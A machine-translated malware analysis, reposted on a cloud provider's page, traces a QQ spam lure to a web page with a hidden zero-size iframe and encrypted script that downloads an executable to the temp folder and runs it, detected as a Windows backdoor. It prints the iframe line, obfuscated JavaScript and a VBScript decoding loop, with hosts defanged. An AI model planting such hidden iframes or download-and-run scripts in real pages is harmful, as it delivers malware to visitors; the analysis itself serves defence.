Spread backdoor. win32.agent. ahj

Source: Internet
Author: User

EndurerOriginal
1Version

Qq receives the following information:
/---
I just found a free online movie station with a large number of passionate N-level films. The viewing speed is quite fast! Hxxp: // P2P. m *** M1 *** 6 *** 8 ***. Info
---/

Hxxp: // P2P. m *** M1 *** 6 ** 8 ***. info/Home PageCode included:

/---
<IFRAME src = "hxxp: // SMS. E *** es *** Ms ** s.com/m?#}.html "width =" 0 "Height =" 0 "frameborder =" 0 "> </iframe>
---/

Hxxp: // SMS. e *** es *** Ms *** s.com/m?##.htmlContains Javascript script code encrypted with crypthtml XP (unregistered version.

The decrypted content contains a piece of Javascript script code and a piece of VBScript code.

The Javascript script code is as follows:
/---
Wc96 = 2956; If (document. all) {function _ DM () {return false}; function _ MDM () {document. oncontextmenu = _ DM; setTimeout ("_ MDM ()", 800)}; _ MDM ();} document. oncontextmenu = new function ("Return false"); function _ NDM (e) {If (document. layers | window. sidebar) {If (E. which! = 1) return false ;}}; if (document. layers) {document. captureevents (event. mousedown); document. onmousedown = _ NDM;} else {document. onmouseup = _ NDM;}; vp56 = 4099; Cx26 = 958; function _ DDS () {If (document. all) {document. onselectstart = function () {return false}; setTimeout ("_ DDS ()", 700) };_ DDS (); ak86 = 2101; co98 = 7242; ty3 = 100; er10 = 2383; ex7 = 8673; _ licensed_to _ = "";
---/
The main function is to define some variables and assign values while disabling right-clicking.

The value of uurlin the vbscriptscript code exposes that the URL of the malicious file to be downloaded is I .exe on another website.
However, the specific download and running methods are saved in variable S.

The value of variable S is determined by the Code
/---
D = ""
Do While Len (s)> 1
K = "& H" + Left (S, 2)
P = clng (k)
M = CHR (P)
D = D & M
S = mid (s, 3)
Loop
---/
.

The decrypted s value is a piece of VBScript code. The function is to use Microsoft. XMLHTTP and SCR accept pting. fileSystemObject downloads the I .exe file and saves it as % Temp %/pe.exe. The created content is: shell. shellExecute "+ % Temp %/pe.exe +", "" open "", 0 "file pe.vbs, and run pe.exe with q.shellexecute.

Use the ShellExecute method of the Shell. Application Object Q to run the program.

File description:D:/test/I .exe
Attribute: ---
Language: English (USA)
File version: 5.2.20.0.1830
Note: asn.2 runtime APIs
Copyright: (c) Microsoft Corporation. All rights reserved.
Note:
Product Version: 5.2.20.0.1830
Product Name: Microsoft (r) Windows (r) Operating System
Company Name: Microsoft Corporation
Legal trademark:
Internal Name:
Source File Name:
Creation Time: 22:46:57
Modification time: 22:46:58
Access time:
Size: 19498 bytes, 19.42 KB
MD5: 4d6df04ad8aaaa7537a9253b563b2d35

Impersonate Microsoft files ......

Scanned file: I .exe-infected

I .exe-infected by backdoor. win32.agent. ahj

Statistics:
Known viruses: 280806 Updated: 12-03-2007
File size (Kb ): 20 Virus bodies: 1
Files: 1 Warnings: 0
Archives: 0 Suspicious: 0

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.